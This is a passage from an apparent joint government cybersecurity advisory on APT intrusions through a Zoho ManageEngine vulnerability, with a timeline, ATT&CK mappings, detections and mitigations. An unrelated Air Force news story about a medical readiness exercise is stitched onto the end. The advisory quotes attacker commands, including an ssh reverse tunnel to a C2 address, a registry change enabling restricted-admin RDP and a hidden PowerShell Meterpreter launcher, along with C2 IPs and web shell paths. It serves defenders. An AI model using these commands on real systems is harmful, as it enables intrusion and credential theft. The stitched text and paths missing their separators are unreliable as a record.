At the time of analysis, the firewall access control lists (ACLs) allowed all outbound connections. Considering APT actors utilized an outbound proxy, the RDP session was successfully established as the connection was initiated from the ServiceDesk system.

Note: RDP is a common feature in operating systems, which allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.

2023-01-21

14:31:01

SSH tools downloaded to establish reverse (remote) communication.

Three identified executables, which provide a command line interface with the compromised system, were observed in the following file system locations:

  • c:windowssystem32ssh-shellhost.exe
  • c:windowssystem32ssh-agent.exe
  • c:windowssystem32ssh-add.exe

While the files were not identified as malicious, they were loaded for malicious purposes.

2023-01-21

14:33:11

license validf scheduled task created to communicate with malicious IP 104.238.234[.]145.

license validf scheduled task [T1036.004] was created to execute ssh.exe on a recurring basis on the ServiceDesk system [T1053.005]:

c:WindowsSystem32ssh.exe -N -f -R 12100 sst@104.238.234.145 -p 443 -o StrictHostKeyChecking=no

Analysis identified ssh.exe was used to establish a SSH reverse tunnel to the APT actors’ C2 with dynamic port forwarding [T1572]. This allowed the actors to send traffic from their C2 server into the environment and connect directly to other systems and resources.

2023-01-21

14:51:49

PsExec executed on the ServiceDesk system.

Analysis identified evidence and execution of two files (PsExec.exe and psexec.exe) on the ServiceDesk system. These files were determined to be benign.

APT actors utilized PsExec to create a scheduled task and force-store administrative credentials to the local machine.

psexec.exe -i -s C:WindowsSystem32mmc.exe /s C:WindowsSystem32taskschd.msc

powershell New-ItemProperty -Path "HKLM:SystemCurrentControlSetControlLsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Note: PsExec, a command line utility from Microsoft’s Sysinternals Suite, is known to be used for lateral movement; evidence of lateral movement via PsExec has not been confirmed.

2023-01-21

14:55:02

ProcDump created on the ServiceDesk system.

ProcDump was created within the c:windowssystem32prc64.exe directory. This was later identified as a method for enumerating running processes/applications [T1057] and dumping LSASS credentials.

2023-01-24

15:07:18

Apache Log4j exploit attempted against the ServiceDesk system.

APT actors attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful. The two IPs and one domain associated with this exploitation attempt are:

  • 80.85.241[.]15
  • 68.177.56[.]38
  • main.cloudfronts[.]net

2023-01-25

00:17:33

Mimikatz credential dump files created.

One file (c:ManageEngineServiceDeskbin1.txt) was created as a method for Mimikatz to dump/write credentials to disk on the ServiceDesk system.

Note: This is a different path and time associated with Mimikatz than listed above.

2023-01-29

HTTP-GET requests sent to C2 IP 92.118.39[.]82.

The server hosting ServiceDesk was observed beaconing/sending HTTP-GET requests to a suspected APT-controlled C2 server, indicating malware was successfully implanted.

2023-02-02

05:51:08

Resource.aspx web shell detected.

Using additionally compromised, legitimate administrative credentials, APT actors logged into the Outlook Web Application (OWA) server from the ServiceDesk system. The actors dropped an Active Server Pages Extended (ASPX) web shell in the following file system location, which was designed to execute remote JavaScript code [T1059.007] on the OWA server [T1505.003]:

  • c:Program FilesMicrosoft Office Web AppsRootWebSiteen-usresource.aspx

Note: The administrative user’s credentials were obtained from the APT actors’ collection (LSASS dump) of credentials from the entire AD domain. This user is separate from the actor-created Azure user account.

See MAR-10430311-1.v1 for additional details.

2023-02-02

18:45:58

Metasploit service installed.

APT actors installed Metasploit with the following attributes on the organization’s domain controller [T1059.001]:

  • Service Name: QrrCvbrvnxasKTSb [T1543.003]
  • Service File Name: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4) [T1564.003]

Note: Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform several actions, including discovery of information and execution of code.

2023-02-03

03:27:59

ConfigLogin.aspx web shell detected.

APT actors dropped an additional ASPX web shell on a web server in the following file system location:

  • c:inetpubwwwrotuninetcssfont-awesomecssConfigLogin.aspx

See MAR-10430311-1.v1 for additional details.

2023-02-03

15:12:23

wkHPd.exe created to communicate with malicious IP 108.62.118[.]160.

APT actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe [T1587.001]. This variant serves as an attack payload that runs an interactive shell and allows a malicious actor to control and execute code on a system.

See MAR-10430311-1.v1 for additional details.

2023-02-08

08:56:35,

2023-02-09

20:19:59,

2023-03-04,

2023-03-18

Hypertext Preprocessor (PHP) files uploaded via HTTP-POST request from malicious IP 193.142.146[.]226.

PHP files were uploaded to the ServiceDesk system via HTTP-POST request. APT actors were observed writing 16 instances of the following files to disk:

  • [REDACTED]/wp-content/themes/seotheme/db.php (12 instances)
  • [REDACTED]/wp-content/plugins/ioptimization/IOptimize.php (4 instances)

2023-03-06

06:49:40

Interact.sh

APT actors executed Domain Name System (DNS) scanning at an additional server (not the ServiceDesk system) and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack [T1046].

Destination IP: 103.105.49[.]108

Post-engagement analysis was extended but analysts were unable to determine additional actions taken by the APT actors, likely due to a lack of sensor coverage and data unavailability. With the data available, it was determined APT actors used the tools listed in Table 2 during their operations.

Table 2: Observed Tools Used by APT Actors

Tool

Description

Observation

Mimikatz [2]

A credential dumping tool capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.

In addition to using Mimikatz for credential dumping, APT actors dumped the following Windows Registry Hive files:

These files were dumped to obtain registry information such as users on the system, data used by the operating system [T1012], and installed programs.

Ngrok [3]

Ngrok software operates by running a client process on the machine and creating a private connection tunnel to a designated open port. Ngrok delivers instant ingress to applications in any cloud, private network, or devices with authentication, load balancing, and other critical controls.

In recent years, Ngrok has been leveraged maliciously by a variety of threat actors, including use for persistence, lateral movement, and data exfiltration.[4],[5],[6]

Using Ngrok as an external service, APT actors were able to gain access to and utilize the command line on victim systems.

Note: CISA and co-sealers have observed this commonly used commercial platform being abused by malicious actors to bypass typical firewall controls. Ngrok’s ability to tunnel RDP and other services securely over internet connections makes it a target for abuse by malicious actors.

ProcDump

A command-line application used to monitor processes and create crash dump files. A crash dump file contains the data loaded in memory at the time the dump was triggered. It is typically used for troubleshooting errors with an application or operating system.

APT actors used ProcDump to conduct reconnaissance and examine spawned processes (applications in use). This tool was also utilized as a utility for dumping credentials from the server hosting ServiceDesk Plus.

Metasploit

Metasploit is an open-source penetration testing software.

APT actors’ specific use of Meterpreter—an attack payload of Metasploit—serves as an interactive shell and allows threat actors to control and execute code on a system.

Interact.sh

An open-source tool for detecting external interactions (communication).[7] This tool is used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity.

APT actors likely used Interact.sh to refrain from using and disclosing their own C2 infrastructure.

anydesk.exe

A remote desktop application that provides platform-independent remote access to personal computers and other devices running the host application. It offers remote control, file transfer, and VPN functionality.

Between early-February and mid-March 2023, anydesk.exe was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer [T1553.002]. APT actors compromised one host and moved laterally to install the executable on the remaining two [T1570]—listed in order of time, as follows:

  • c:programdataanydesk.exe
  • c:Users[REDACTED]DownloadsAnyDesk.exe
  • c:Users[REDACTED]DocumentspersonalprogramAnyDesk.exe

Note: Analysts confirmed APT actors’ weaponized use of anydesk.exe but were unable to confirm how the software was installed on each host.

quser.exe

A valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server [T1049], including the name of the user, name of the session on the remote desktop session host server, session ID, state of the session (active or disconnected), idle time (number of minutes since last keystroke or mouse movement), and date/time the user logged on.[8]

APT actors were observed using this tool as early as March 2023 across four locations with the same name but different hashes (one of which is associated with the Portuguese [Brazil] language pack):

c:ProgramFilesWindowsAppsMicrosoft.LanguageExperiencePackpt-BR_19041.56.186.0_neutral__8wekyb3d8bbweWindowsSystem32pt-BR

xpack.exe

A custom .NET loader that decrypts (AES), loads, and executes accompanying files.

Xpack.exe indicators were present on multiple organization hosts, with an unverified user account observed navigating to the sites: xpack.github[.]io and xpack.disqus[.]com. Additionally, one administrator account and multiple user accounts were observed executing the xpack.exe file from a hidden directory [T1564.001]:

c:USERS[REDACTED].P2POOLPLUGINSORG.ECLIPSE.EMBEDCDT.TEMPLATES.XPACK_6.3.1.202210101738

This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration [T1074]. Note: The data exfiltrated is unknown.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 3-13 for all referenced APT actors’ tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 3: Resource Development

Technique Title

ID

Use

Acquire Infrastructure: Botnet

T1583.005

Actors used User-Agent string Hello World as an initial step of the Mirai botnet to later download malicious artifacts.

Develop Capabilities: Malware

T1587.001

Actors created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, listed as wkHPd.exe. This malware serves as an attack payload that runs an interactive shell; it allows for control and code execution on a system.

Obtain Capabilities: Exploits

T1588.002

Actors leveraged the legitimate ConnectWise ScreenConnect client to download and utilize the credential dumping tool, mimikatz.exe.
Table 4: Initial Access

Technique Title

ID

Use

Exploit Public-Facing Application

T1190

Actors exploited a known vulnerability (CVE-2022-47966) in the organization’s web server hosting Zoho ManageEngine ServiceDesk Plus.

Actors also attempted to exploit a known Apache Log4j vulnerability (CVE-2021-44228) in the ServiceDesk system but were unsuccessful.
Table 5: Execution

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

Actors installed and used Metasploit via PowerShell on the organization’s domain controller.

Command and Scripting Interpreter: JavaScript

T1059.007

Actors dropped an ASPX web shell on the OWA server, which was designed to execute remote JavaScript code.
Table 6: Persistence

Technique Title

ID

Use

Scheduled Task/Job: Scheduled Task

T1053.005

Actors created the scheduled task license validf to execute ssh.exe on a recurring basis. This executable was observed as means of establishing persistence on the ServiceDesk system.

Valid Accounts: Local Accounts

T1078.003

Actors compromised and utilized account credentials from a previously hired contractor, of which the contract ended prior to the timeframe of observed activity.

External Remote Services

T1133

ssh.exe executes on a recurring basis via a scheduled task on the ServiceDesk system as a method for access via SSH.

Create Account: Local Account

T1136.001

Actors created a local account with administrative permissions on the server hosting ServiceDesk Plus.

Server Software Component: Web Shell

T1505.003

Actors logged into the OWA server from the ServiceDesk system and dropped an ASPX web shell to establish persistent access and execute remote code.

Create or Modify System Process: Windows Service

T1543.003

Actors created a Windows Service via Metasploit.
Table 7: Privilege Escalation

Technique Title

ID

Use

Exploitation for Privilege Escalation

T1068

Through exploitation of CVE-2022-47966, actors were given root level access on the web server and created a local user account named Azure with administrative privileges.
Table 8: Defense Evasion

Technique Title

ID

Use

Indicator Removal: Clear Windows Event Logs

T1070.001

Actors compromised and used disabled, legitimate administrative account credentials to delete logs from several critical servers in the environment.

Masquerading: Masquerade Task or Service

T1036.004

Actors created a scheduled task license validf, which appears as legitimate/benign and executes ssh.exe on a recurring basis on the ServiceDesk system.

Masquerading: Masquerade File Type

T1036.008

Actors attempted to export three files, which were analyzed and identified as LSASS dump files. These files were renamed with .zip and .gif extensions to evade detection.

Obfuscated Files or Information: Embedded Payloads

T1027.009

Actors downloaded the malware bitmap.exe on the ServiceDesk system to execute an obfuscated, embedded malicious payload from its C2 server.

Subvert Trust Controls: Code Signing

T1553.002

Anydesk.exe was observed on three hosts with different certificate issuers and hashes—none of which were the certified issuer.

Hide Artifacts: Hidden Files and Directories

T1564.001

Actors used xpack.exe as a method for decrypting, loading, and executing accompanying files from a hidden directory.

Hide Artifacts: Hidden Window

T1564.003

Actors used -w hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
Table 9: Credential Access

Technique Title

ID

Use

OS Credential Dumping

T1003

Actors created three files as means for Mimikatz to dump/write credentials to disk on the ServiceDesk system.

OS Credential Dumping: LSASS Memory

T1003.001

Actors successfully accessed and dumped credentials stored in the process memory of LSASS for the AD domain, including with the use of ProcDump.

OS Credential Dumping: Security Account Manager

T1003.002

Actors dumped sam.hiv to obtain information about users on the system.
Table 10: Discovery

Technique Title

ID

Use

System Network Connections Discovery

T1049

Quser.exe was executed to acquire information about user sessions on a Remote Desktop Session Host server.

Query Registry

T1012

Actors dumped system.hiv and security.hiv to obtain information about the data used by the operating system.

Remote System Discovery

T1018

Actors downloaded the legitimate file/application nmap.exe via the Azure user to conduct network information gathering efforts.

Network Sniffing

T1040

Actors downloaded the legitimate file/application npcap.exe via the Azure user to conduct credential gathering efforts.

Network Service Discovery

T1046

Actors executed DNS scanning at a web server and directed callback to the Interact.sh domain, which indicated the server was susceptible to a DNS-style attack.

Process Discovery

T1057

ProcDump was created within the c:windowssystem32prc64.exe directory as a method for enumerating running processes/applications.
Table 11: Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Ngrok was used to establish an RDP connection with the ServiceDesk system.

Lateral Tool Transfer

T1570

Actors compromised one host and moved laterally to install anydesk.exe on two additional hosts.
Table 12: Collection

Technique Title

ID

Use

Data Staged

T1074

Actors executed xpack.exe malware from a hidden directory. This malware was predominantly used to execute system commands, drop additional malware and tools, and stage data for exfiltration.
Table 13: Command and Control

Technique Title

ID

Use

Application Layer Protocol: Web Protocols

T1071.001

Hello World User-Agent string was identified in a HTTP request. Communication occurred between the organization’s web server and an actor-controlled C2 IP address.

Remote Access Software

T1219

Actors leveraged ConnectWise ScreenConnect to connect to the ServiceDesk system.

Anydesk.exe was run on at least three different hosts in the environment.

Non-Standard Port

T1571

Actors initiated multiple TLS-encrypted sessions on non-standard TCP port 10443.

Protocol Tunneling

T1572

Actors were observed leveraging SSH to build a reverse tunnel with their C2 server to dynamically forward traffic into the victim organization’s environment.

Using Ngrok as an external service, actors were also able to gain access to and use the command line on victim systems via RDP.

Encrypted Channel: Asymmetric Cryptography

T1573.002

Actors initiated multiple TLS-encrypted sessions on TCP port 10443, indicating successful exchanges of data transfer from the firewall device.

DETECTION METHODS

CISA and co-sealers recommend reviewing Tables 3-13: Identified ATT&CK Techniques for Enterprise in conjunction with the detections in this section to identify similar activity.

  • Enable logging for new user creation [DS0002], as well as monitor executed commands and arguments for actions that are associated with local account creation, such as net user /add, useradd, and dscl -create [DS0017].
  • Monitor for newly constructed scheduled tasks by enabling the “Microsoft-Windows-TaskScheduler/Operational” setting within the event logging service. Monitor for changes made to scheduled tasks that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools [DS0003].
  • Monitor for API calls that may create or modify Windows services (ex: CreateServiceW()) to repeatedly execute malicious payloads as part of persistence [DS0009].
  • Monitor executed commands and arguments that may attempt to access credential material stored in the process memory of the LSASS [DS0017].
  • Monitor for user accounts logged into systems associated with RDP (ex: Windows EID 4624 Logon Type 10) [DS0028].
  • Monitor for newly-constructed network connections associated with pings/scans that may attempt to collect a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for lateral movement from the current system [DS0029].
  • Conduct full port scans (1-65535) on internet-facing systems—not just a subset of the ports.

MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Manage Vulnerabilities and Configurations [CPG 1.E, CPG 3.A]

CISA and co-sealers identified that exploitation of CVE-2022-47966 granted initial access to the public-facing application, Zoho ManageEngine ServiceDesk Plus. Multiple Zoho ManageEngine on-premises products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of version 1.4.1 of Apache XML Security for Java (also known as xmlsec) from the Apache Santuario project. Due to the xmlsec XSLT features by design in that version, the application is responsible for certain security protections. CISA and co-sealers recommend the following:

  • Document device configurations [CPG 2.O]. Organizations should maintain updated documentation describing the current configuration details of all critical IT assets (and OT, where applicable), as this facilitates more effective vulnerability and response activities.
  • Keep all software up to date and patch systems for known exploited vulnerabilities. In places with known exploited vulnerabilities on an endpoint device (e.g., firewall security appliances), conduct investigation prior to patching [CPG 1.E].
  • Follow a routine patching cycle [M1051] for all operating systems, applications, and software (including all third-party software) to mitigate the potential for exploitation.
  • Prioritize remediation of vulnerabilities on internet-facing systems, for example, by conducting continuous automated and/or routine vulnerability scans [M1016]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations’ internet-accessible assets. Organizations can email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services” to get started. For additional guidance on remediating these vulnerabilities, see CISA Insights – Remediate Vulnerabilities for Internet-Accessible Systems.
  • Deploy security.txt files [CPG 4.C]. All public-facing web domains have a security.txt file that conforms to the recommendations in RFC 9116.[9]

Segment Networks [CPG 2.F]

CISA and co-sealers identified that the organization did not employ proper network segmentation, such as a demilitarized zone (DMZ), during the initial discovery phase of the incident response. A DMZ serves as a perimeter network that protects and adds an extra layer of security to an organization’s internal local area network (LAN) from untrusted traffic.

  • Employ proper network segmentation, such as a DMZ, and ensure to address the following recommendations. Note: The end goal of a DMZ network is to allow an organization to access untrusted networks, such as the internet, while ensuring its private network or LAN remains secure. Organizations typically store external-facing services and resources, as well as servers for DNS, File Transfer Protocol (FTP), mail, proxy, Voice over Internet Protocol (VoIP), and web servers in the DMZ [CPG 2.K, CPG 2.W].
    • Limit internet-facing port exposure for critical resources in the DMZ networks.
    • Limit exposed ports to only required IP addresses and avoid placing wildcards in destination port or host entries.
    • Ensure unsecured protocols like FTP and HTTP are limited in use and restricted to specific IP ranges.
    • If data flows from untrusted zone to trusted zone, ensure it is conducted over a secure protocol like HTTPS with mandatory multi-factor authentication.
  • Use a firewall or web-application firewall (WAF) and enable logging to prevent/detect potential exploitation attempts [M1050]. Review ingress and egress firewall rules and block all unapproved protocols. Limit risky (but approved) protocols through rules.
    • Use WAF to limit exposure to just approved ports, as well as monitor file changes in web directories.
  • Implement network segmentation to separate network segments based on role and functionality. Proper network segmentation significantly reduces the ability for threat actor lateral movement by controlling traffic flows between—and access to—various subnetworks. See CISA’s Layering Network Security Through Segmentation infographic and the National Security Agency’s (NSA’s) Segment Networks and Deploy Application-Aware Defenses.

Manage Accounts, Permissions, and Workstations

APT actors were able to leverage disabled administrative accounts, as well as clear logs on several critical servers, which prevented the ability to detect follow-on exploitation or data exfiltration. CISA and co-sealers recommend the following:

  • Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins [M1032]. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA’s Implementing Phishing-Resistant MFA Factsheet.
  • Employ strong password management alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. Set a password policy to require complex passwords for all users (minimum of 16 characters) and enforce this new requirement as users’ passwords expire [CPG 2.A, CPG 2.B, CPG 2.C].
  • Implement the principle of least privilege to decrease threat actors’ abilities to access key network resources.
  • Limit the ability of a local administrator account to log in from a local interactive session [CPG 2.E] (e.g., “Deny access to this computer from the network”) and prevent access via an RDP session.
  • Establish policy and procedure for the prompt removal of unnecessary (disabled) accounts and groups from the enterprise that are no longer needed, especially privileged accounts. Implement and enforce use of Local Administrator Password Solution (LAPS).
  • Control and limit local administration, ensuring administrative users do not have access to other systems outside of the local machine and across the domain.
  • Create a change control process for all privilege escalations and role changes on user accounts. Enable alerts on privilege escalations and role changes, as well as log privileged user changes in the network environment and create alerts for abnormal events.
  • Create and deploy a secure system baseline image to all workstations. See Microsoft’s guidance on Using Security Baselines in Your Organization.
  • Implement policies to block workstation-to-workstation RDP connections [CPG 2.V] through a Group Policy Object on Windows, or by a similar mechanism. The RDP service should be disabled if it is unnecessary [M1042].

Secure Remote Access Software

Remote access software provides a proactive and flexible approach for organizations to internally oversee networks, computers, and other devices; however, cyber threat actors increasingly co-opt these tools for access to victim systems. APT actors were observed using legitimate remote access tools—ConnectWise ScreenConnect and AnyDesk—to connect to victim hosts within the organization’s environment and further conduct malicious operations. CISA and co-sealers recommend the following:

  • Establish a software behavior baseline to detect anomalies in behavior [CPG 2.T, CPG 2.U].
  • Monitor for unauthorized use of remote access software using endpoint detection tools.

For more information, see CISA’s joint Guide to Securing Remote Access Software on best practices for using remote capabilities and how to detect and defend against malicious actors abusing this software.

Other Best Practice Mitigation Recommendations

  • Use application allowlists on domain controllers, administrative hosts, and other sensitive systems. Following exploitation of the public-facing application (Zoho ManageEngine ServiceDesk Plus), APT actors were able to download and execute multiple files on the system, which were then utilized to enumerate the network and perform reconnaissance operations.
    • Use directory allowlisting rather than attempting to list every possible permutation of applications in a network environment. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), and SYSTEM32. Disallow all other locations unless an exception is granted and documented. Application directory allowlisting can be enabled through Microsoft Software Restriction Policy or AppLocker and can prevent the execution of unauthorized software.
  • Audit scheduled tasks and validate all findings via a Group Policy Object (GPO) or endpoint detection and response (EDR) solution.
  • Follow Microsoft’s Best Practices for Securing Active Directory.
  • Review NSA’s Network Infrastructure Security Guide.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and co-sealers recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and co-sealers also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 3-13).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and co-sealers recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, the FBI, and CNMF do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or CNMF.

REFERENCES

  1. Snort: Known Malicious User-Agent String – Mirai
  2. MITRE: Mimikatz
  3. MITRE: Ngrok
  4. AA22-320A: Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester
  5. AA22-294A: #StopRansomware: Daixin Team
  6. AA23-075A: #StopRansomware: LockBit 3.0
  7. GitHub: Interactsh
  8. Microsoft: Quser
  9. Internet Engineering Task Force (IETF): RFC 9116

VERSION HISTORY

September 7, 2023: Initial version.

Posted on

Airmen reflect on lessons learned at Patriot Medic 23

Source: United States Air Force

JOINT BASE SAN ANTONIO-LACKLAND, Texas (AFNS) —  

The 433rd Medical Group returned home after validating its readiness to deploy by participating in Patriot Medic 23. The training, part of a larger exercise called Global Medic, involved more than 7,100 Reserve, active duty and allied forces as well as coalition partners.

Seventy Reserve Airmen from the 433rd MDG spent 19 days undergoing rigorous and realistic training at Youngstown Air Reserve Station, Ohio and Fort McCoy, Wisconsin. On top of validating the Airmen’s readiness to deploy, the annual exercise served to enhance interoperability between units, medics, individual reservists and the joint force.

Patriot Medic 23 provided “Alamo Wing” reservists opportunities to sharpen their skills beyond what can typically be accomplished during monthly unit training activities.

“What I’m grateful for is that I’d never seen our people in the 433rd Aeromedical Staging Squadron come together before, they’d never had too before” said Maj. Reginald Whittington, 433rd ASTS Bravo Flight commander. “I was very impressed with the junior Airmen, the senior leadership … I would go to war with these people … we have people in the unit that I would trust with my life.”

Participation in Patriot Medic led to learning moments for new Airmen and veterans alike. Airmen from the 433rd ASTS embedded with the 914th ASTS, based out of Niagara Falls ARS, New York as part of their training at the exercise.

“It was the first time in my career that we embedded with another unit,” Whittington, who has served for more than 20 years, noted. “We literally came together with another ASTS who has the same challenges, the same successes, the same, or different, solutions to certain things, and we were able to maximize what works best.”

For several of the “Alamo Wing” reservists, this was only their first or second exercise with the unit.

“When I went in there, honestly I didn’t know what to expect,” said Senior Airman Luis Martinez, a 433rd ASTS medic. “My job here is as a medic so that’s my mentality, I’m going to go be a medic … but it turned out to be a lot more than that. I learned new roles and responsibilities. I learned how to be a leader and I learned also how to be a follower.”

The exercise not only tested the Reserve Airmen’s knowledge of their jobs and their physical capabilities, but also their mental resiliency. Many of the lessons were learned the hard way.

“We failed a lot, which was a good thing because you need to feel that pain and then you come up with better solutions next time,” said Senior Airman Lindsey Neubauer, 433rd ASTS medic.

Both Neubauer and Martinez received challenge coins for their performance at the exercise, a traditional way for military leaders to recognize the efforts of their troops.

Patriot Medic also allowed 433rd MDG senior leaders to evaluate and mentor their Airmen, while strengthening the bonds between the members of their teams.

“I’ve been in for 16 years … this is probably one of the most realistic ones,” Master Sgt. Julie Fuleky, 433rd Medical Squadron Bravo flight chief, pointed out. “As we went through it, you started to see the team come together … it was a very valuable exercise because, where we normally only see each other two days a month, we were working closely together for 19 days.”

Col. Michelle Van Sickle, 433rd MDG commander, served as the joint task force surgeon at Fort McCoy during the exercise. She observed after the exercise that many of the newer medics were able to fully understand their mission and the importance of training prior to deployment, while more seasoned medics expanded their knowledge about operating in a contested environment.

“They all came together to accomplish the mission, and all performed at, or above, the standard we expected,” Van Sickle said. “I am proud of them.”